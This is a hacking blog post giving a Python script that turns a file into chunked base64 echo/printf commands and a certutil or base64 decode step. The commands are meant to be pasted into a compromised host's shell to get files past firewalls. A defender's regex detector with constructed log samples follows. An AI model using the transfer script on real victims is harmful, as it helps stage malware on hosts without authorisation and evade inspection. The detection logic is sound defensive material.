Lifehacks for hackers: Clipboard File Transfer stable script

Researchers transfer files to compromised hosts with several techniques, since the host configuration varies from case to case. Off the top of my head I can list at least twenty real ways:

  • The attacker machine hosts the file on a server: HTTP, FTP, TFTP, SSH, SMB and other protocols, or a raw socket with netcat, after all
  • The client downloads the file: wget, PowerShell, cscript, certutil, Python, a browser, RDP, pwnieforum, the debug.exe method, and others
  • The client runs a server and waits for the file upload: SMB, HTTP, netcat, python/perl/ruby/php, and others
  • Situation-based: meterpreter file transfers, file upload through a compromised website, and others

But, just logically, an attacker with a shell that supports copy & paste must be able to transfer files, even if the host is isolated and even if a firewall inspects traffic and intercepts malware on the fly. The script below generates the commands for such a clipboard file transfer: it base64-encodes the file, splits the text into chunks, emits one echo command per chunk that appends to a temporary file on the target, and finishes with a decode command (certutil on Windows, base64 on Linux).

#!/usr/bin/python3

import argparse
import os
import sys
from base64 import b64encode

if __name__ == "__main__":
    arg_parser = argparse.ArgumentParser()
    arg_parser.add_argument('file', type=str, help="the file to send")
    arg_parser.add_argument('--bytecount', type=int, default=4096, help="how many characters of base64-encoded data to transfer in a single step")
    arg_parser.add_argument('--sleep', type=int, default=2, help="how many seconds to sleep between steps")
    arg_parser.add_argument('--outputFile', type=str, default='out.txt', help="the copy-paste file location")
    arg_parser.add_argument('--tempFile', type=str, default='temporary.txt', help="the name of the temporary file on the target system")
    arg_parser.add_argument('--platform', choices=['windows', 'linux'], default='windows', type=str, help="target platform, default - windows")
    args = arg_parser.parse_args()

    # Base64 output is pure ASCII, so decode() yields the text directly
    # (the old str(...)[2:-1] trick only stripped the b'...' of a bytes repr).
    with open(args.file, 'rb') as fin:
        data = b64encode(fin.read()).decode('ascii')

    # Decode to the base name only, so a local path such as /tmp/tool.bin
    # does not leak into the generated commands.
    target_name = os.path.basename(args.file)
    # Number of chunks, rounded up: no empty trailing chunk when the length
    # divides evenly by bytecount.
    steps = max(1, -(-len(data) // args.bytecount))

    ret = ""
    if args.platform == 'windows':
        ret += "del " + args.tempFile + "\n"
        for i in range(steps):
            chunk = data[i * args.bytecount:(i + 1) * args.bytecount]
            # "echo|set /P=" prints the text without a trailing newline
            ret += "echo|set /P=" + chunk + ">> " + args.tempFile + "\n"
            ret += "echo [" + str(i + 1) + "/" + str(steps) + "]\n"
            if args.sleep:
                # cmd.exe has no sleep builtin; ping -n N waits about N-1 seconds
                ret += "ping 127.0.0.1 -n " + str(args.sleep + 1) + " > nul\n"
            ret += "cls\n"
        ret += "certutil -decode " + args.tempFile + " " + target_name + "\n"

    elif args.platform == 'linux':
        ret += "rm -f " + args.tempFile + "\n"
        for i in range(steps):
            chunk = data[i * args.bytecount:(i + 1) * args.bytecount]
            # printf is portable; "echo -n" prints a literal -n under dash/sh
            ret += "printf '%s' '" + chunk + "' >> " + args.tempFile + "\n"
            ret += "echo [" + str(i + 1) + "/" + str(steps) + "]\n"
            if args.sleep:
                ret += "sleep " + str(args.sleep) + "\n"
            ret += "clear\n"
        ret += "base64 -d " + args.tempFile + " > " + target_name + "\n"

    else:
        print("bad platform")
        sys.exit(1)

    with open(args.outputFile, "w") as fout:
        fout.write(ret)

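From the defender's side, the generated command sequence leaves a distinctive trace in shell history or process-creation telemetry: many appends of base64-shaped text to one file, followed by certutil -decode or base64 -d on that same file. The detector below is an added example written for this page, not code from the original post; the log lines, the staging file name, the 16-character base64 run threshold and the three-chunk minimum are all constructed assumptions for the demo.

```python
#!/usr/bin/env python3
"""Flag the chunked "echo <base64> >> file ... decode file" staging pattern
in process-creation or shell-history logs.

Added example for defenders.  All sample lines below are constructed for the
demo; thresholds are assumptions, not vendor defaults."""
import re
from collections import OrderedDict

# A run of base64 alphabet characters long enough to be rare in ordinary
# command lines.  16 is an assumed demo threshold; tune it to your fleet.
B64_RUN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")
# Append redirection to a file, Windows or POSIX: ">> name"
APPEND_TO = re.compile(r">>\s*([^\s&|;]+)")
# Decoders that turn the staged text back into bytes:
#   certutil -decode IN OUT      base64 -d IN      base64 --decode IN
DECODE_CMD = re.compile(
    r"certutil(?:\.exe)?\s+-decode\s+(\S+)|base64\s+(?:-d|--decode)\s+(\S+)",
    re.IGNORECASE)


def analyse(lines, min_chunks=3):
    """Return one finding per staging file that received at least `min_chunks`
    base64-looking appends.  `decoded_at` is the line number of the decode
    command for that file (None if it never came); that is the moment the
    transferred payload exists as bytes on disk."""
    staged = OrderedDict()
    for lineno, line in enumerate(lines, 1):
        m = APPEND_TO.search(line)
        if m:
            target = m.group(1)
            run = B64_RUN.search(line[:m.start()])   # text left of the '>>'
            if run:
                entry = staged.setdefault(target, {
                    "file": target, "chunks": 0, "b64_chars": 0,
                    "first_line": lineno, "decoded_at": None})
                entry["chunks"] += 1
                entry["b64_chars"] += len(run.group(0))
        d = DECODE_CMD.search(line)
        if d:
            target = d.group(1) or d.group(2)
            # A lone decode of an unstaged file is ordinary admin activity;
            # only decodes of a file we saw being staged are interesting.
            if target in staged:
                staged[target]["decoded_at"] = lineno
    return [e for e in staged.values() if e["chunks"] >= min_chunks]


# Constructed cmd.exe history in the shape the generator above would produce.
WINDOWS_LOG = [
    "whoami",
    "dir >> listing.txt",                       # benign append, no base64 run
    "del temporary.txt",
    "echo|set /P=Q29uc3RydWN0ZWQgc2FtcGxl>> temporary.txt",
    "echo [1/4]",
    "ping 127.0.0.1 -n 3 > nul",
    "cls",
    "echo|set /P=IGRhdGEgZm9yIHRoZSBkZXRl>> temporary.txt",
    "echo|set /P=Y3RvciBkZW1vLiBUaGlzIGlz>> temporary.txt",
    "echo|set /P=IG5vdCBtYWx3YXJlISE=>> temporary.txt",
    "certutil -decode temporary.txt payload.bin",
    "certutil -hashfile C:\\Windows\\notepad.exe SHA256",  # benign certutil
]

# Constructed bash history for the Linux branch of the generator.
LINUX_LOG = [
    "id",
    "rm -f temporary.txt",
    "printf '%s' 'Q29uc3RydWN0ZWQgc2FtcGxl' >> temporary.txt",
    "sleep 2",
    "clear",
    "printf '%s' 'IGRhdGEgZm9yIHRoZSBkZXRl' >> temporary.txt",
    "printf '%s' 'Y3RvciBkZW1vLiBUaGlzIGlz' >> temporary.txt",
    "base64 -d temporary.txt > payload.bin",
    "echo 'backup finished' >> /var/log/backup.log",
    "base64 -d /tmp/unrelated.b64 > /tmp/x",    # decode with no staging: ignored
]

if __name__ == "__main__":
    for name, log in (("windows", WINDOWS_LOG), ("linux", LINUX_LOG)):
        for finding in analyse(log):
            print(name, finding)
```

The two signals are deliberately combined: a long base64 run alone is noisy (a long alphanumeric filename would trigger it), and certutil -decode or base64 -d alone is common administrative use. Several base64 appends to the same file, followed by a decode of that file, is the sequence the generator above emits and is much rarer in normal operation. In a SIEM the same logic maps to a correlation over process-creation events keyed on the redirect target.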
Pros:

  • Simple to try once
  • Usually works
  • Works through firewalls, since nothing crosses the network except the pasted text

Cons:

  • Slow
  • May require customization
  • May require debugging

Sample usage:

  1. Copy & run the script
  2. Copy the contents of "out.txt" to the clipboard
  3. Paste the data into the victim's shell